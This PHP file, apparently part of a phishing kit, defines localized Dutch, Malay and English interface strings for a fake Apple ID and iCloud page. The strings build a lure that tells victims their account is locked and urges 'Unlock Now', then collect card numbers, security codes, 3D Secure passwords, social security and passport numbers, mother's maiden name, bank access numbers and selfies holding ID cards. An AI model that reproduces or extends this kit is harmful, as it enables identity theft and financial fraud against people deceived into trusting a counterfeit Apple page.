    $trid_sec = "3D Secure Password";
    $mother = "Moeder Maiden Naam";
    $driver = "Rijbewijsnummer";
    $climit = "Kredietlimiet";
    $continue = "Blijft";
    
    $pesan_lock = $locked['NL']['notice'];
    $pesan2_lock = $locked['NL']['desc'];
    $judul_lock = $locked['NL']['title'];
    
    $done = "Accountverificatie voltooid";
    $done_text = "Een ogenblik geduld, terwijl we uw accounttoegang herstellen ...";


    $upload_id = "Upload identiteit";
    $secanswer = "Security & Answer";
    $selectid = "NEEM EEN SELFIE DOOR DE KAART IN TE HOUDEN";
    $selfie = "NEEM EEN SELFIE MET";
    $katacc = "De naam van de kaarthouder en de identiteitskaart moeten overeenkomen en duidelijk zichtbaar zijn.</li><li>Upload uw kaart voor en achter.";
    $selectsec = "SELECT SECURITY QUESTION";
    $frontcc = "VOORKAART";
    $backcc = "ACHTERKAAR";
break;

case "MY":
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "my";
    $bahasas = "my";
    $sstatus = "Status Sistem";
    $privacy = "Dasar Privasi";
    $nextc = "Seterusnya";
    $requiredc = "diperlukan";
    $terms = "Terma & Syarat";
    $signic = "Log masuk ke iCloud";
    $keepme = "Terus saya masuk";
    $setup = "Arahan pemasangan";
    $forgotc = "Tidak mempunyai ID Apple atau terlupa?";
    $yourapp = "ID Apple anda ialah akaun yang anda gunakan untuk mengakses semua perkhidmatan Apple.";
    $aboutapp = "Mengenai ID dan Privasi Apple";
    $signc = "Log masuk dengan Apple ID anda untuk menggunakan iCloud, iTunes, App Store, dan banyak lagi.";
    $html = '<html lang="en">';
    $title = 'Uruskan Apple ID anda - Apple (MY)';
    $title_bill = "Sahkan maklumat anda";
    $login_manage = 'Uruskan akaun Apple anda';
    $input_password = 'Kata Laluan';
    $remember_me = 'Ingat Apple ID saya';
    $forgot_id = '<center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Terlupa Apple ID atau kata laluan?</center>';
    $unlocked = $locked['MY']['button'];
    $goback = "Pergi balik";

    $account_verif = 'Pengesahan akaun';
    $account_id = 'ID Apple anda adalah';
    $sign_out = 'Keluar';
    $account_name = 'Akaun';
    $payment = 'Maklumat <br>Peribadi';
    $reachable = 'REACHABLE AT';
    $creg = 'COUNTRY / REGION';
    $method = 'PAYMENT METHOD';
    $bil = 'Butiran Akaun';
    $desc = 'This payment method will be used when you make purchases in the iTunes Store,    App Store, Apple Online Store, and more.';
    $creditnumber = "nombor kredit kad";
    $secode = "kod keselamatan";
    $fname = "nama pertama";
    $lname = "nama terakhir";
    $street = "alamat jalanan";
    $apt = "apt, suite, building";
    $city = "bandar";
    $state = "negeri";
    $zip = "kod zip";
    $birth = "tarikh lahir";
    $phone = "nombor telefon";
    $save = "Teruskan";
    $cchold = "nama pemegang kad";
    $verify = 'Verify your Apple ID';
    $required = 'Some required information is missing in your Apple ID';
    $clicknow = 'click on Unlock Now in order to continue using it.';
    $unlock = 'Unlock Now';
    $payerror = 'Ralat Pembayaran';
    $ccdeclined = 'Kad kredit anda telah ditolak. Sila masukkan kad kredit lain.';
    $another = 'Cuba Kad Lain';
    $idnumber = "id number";
    $passpor = "passport number";
    $natio = "national id";
    $qatariden = "qatar id";
    $civid = "civil id";
    $ssn = "social security number";
    $accnumber = "account number";
    $sortc = "sort code";
    $osidnumber = "osid number";
    $sin = "social insurance number";
    $citizen = "citizen id";
    $bankacc = "bank access number";
    $cardid = "WEB ID";
    $passid = "Card Password";
    $ccexp = "tarikh luput";
    $besar_name = "NAMA";
    $besar_phone = "TELEFON";
    $besar_add = "ALAMAT";
    $besar_card = "MAKLUMAT KAD";

    $secinfo = "Maklumat Keselamatan";
    $qinfo = "Soalan keselamatan";
    $trid_sec = "Kata Laluan Selamat 3D";
    $mother = "Nama Ibu Ibu";
    $driver = "Nombor Lesen Pemandu";
    $climit = "Had kredit";
    $continue = "Teruskan";
    
    $pesan_lock = $locked['MY']['notice'];
    $pesan2_lock = $locked['MY']['desc'];
    $judul_lock = $locked['MY']['title'];
    
    $done = "Pengesahan Akaun Selesai";
    $done_text = "Sila tunggu sementara kami memulihkan akses akaun anda ...";


    $upload_id = "Muatkan Identiti";
    $secanswer = "Keselamatan & Jawapan";
    $selectid = "AMBIL SELFIE DENGAN MEMEGANG KAD";
    $selfie = "AMBIL SELFIE DENGAN";
    $katacc = "Nama pemegang kad dan kad pengenalan harus sepadan dan dapat dilihat dengan jelas.</li><li>Sila muat naik depan dan belakang kad anda.";
    $selectsec = "SELECT SECURITY QUESTION";
    $frontcc = "KAD FRONT";
    $backcc = "BACK CARD";
break;

default:
    $ddmmyy = "dd/mm/yyyy";
    $ddmm = "mm/yyyy";
    $bahasa = "x";
    $bahasas = "";
    $signic = "Sign in to iCloud";
    $keepme = "Keep me signed in";
    $setup = "Setup Instructions";
    $sstatus = "System Status";
    $privacy = "Privacy Policy";
    $nextc = "Next";
    $requiredc = "required";
    $signc = "Sign in with your Apple ID to use iCloud, iTunes, the App Store, and more.";
    $terms = "Terms & Conditions";
    $html = '<html lang="en">';
    $forgotc = "Don't have an Apple ID or forgot it?";
    $yourapp = "Your Apple ID is the account you use to access all Apple services.";
    $aboutapp = "About Apple ID and Privacy";
    $title = 'Manage your Apple ID - Apple';
    $title_bill = "Confirm your information";
    $login_manage = 'Manage your Apple account';
    $input_password = 'Password';
    $remember_me = 'Remember me';
    $forgot_id = '<center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Forgot Apple ID or password?</center>';
    $unlocked = $locked['EN']['button'];
    $goback = "Go Back";

    $account_verif = 'Account Verification';
    $account_id = 'Your Apple ID is';
    $sign_out = 'Sign Out';
    $account_name = 'Account';
    $payment = 'Personal <br>Information';
    $reachable = 'REACHABLE AT';
    $creg = 'COUNTRY / REGION';
    $method = 'PAYMENT METHOD';
    $bil = 'Account Details';
    $desc = 'This payment method will be used when you make purchases in the iTunes Store,    App Store, Apple Online Store, and more.';
    $creditnumber = "card number";
    $secode = "security code";
    $fname = "first name";
    $lname = "last name";
    $street = "street address";
    $apt = "apt, suite, building";
    $city = "city";
    $state = "state";
    $zip = "zip code";
    $birth = "date of birth";
    $phone = "phone number";
    $save = "Continue";
    $cchold = "cardholders name";
    $verify = 'Verify your Apple ID';
    $required = 'Some required information is missing in your Apple ID';
    $clicknow = 'click on Unlock Now in order to continue using it.';
    $unlock = 'Unlock Now';
    $payerror = 'Payment Error';
    $ccdeclined = 'Your credit card was declined. Please enter another credit card.';
    $another = 'Try Another Card';
    $idnumber = "id number";
    $passpor = "passport number";
    $natio = "national id";
    $qatariden = "qatar id";
    $civid = "civil id";
    $ssn = "social security number";
    $accnumber = "account number";
    $sortc = "sort code";
    $osidnumber = "osid number";
    $sin = "social insurance number";
    $citizen = "citizen id";
    $bankacc = "bank access number";
    $cardid = "WEB ID";
    $passid = "Card Password";
    $ccexp = "expiry date";
    $besar_name = "NAME";
    $besar_phone = "PHONE";
    $besar_add = "ADDRESS";
    $besar_card = "CARD DETAILS";

    $secinfo = "Security Information";
    $qinfo = "Security Question";
    $trid_sec = "3D Secure Password";
    $mother = "Mother Maiden Name";
    $driver = "Driver License Number";
    $climit = "Credit Limit";
    $continue = "Continue";
    
    $pesan_lock = $locked['EN']['notice'];
    $pesan2_lock = $locked['EN']['desc'];
    $judul_lock = $locked['EN']['title'];
    
    $done = "Account Verification Complete";
    $done_text = "Please wait while we restore your account access...";


    $upload_id = "Upload Identity";
    $secanswer = "Security & Answer";
    $selectid = "TAKE A SELFIE BY HOLDING CARD";
    $selfie = "TAKE A SELFIE WITH";
    $katacc = "Cardholders name and ID card should match and be clearly visible.</li><li>Please upload front and back your card.";
    $selectsec = "SELECT SECURITY QUESTION";
    $frontcc = "FRONT CARD";
    $backcc = "BACK CARD";
}
?>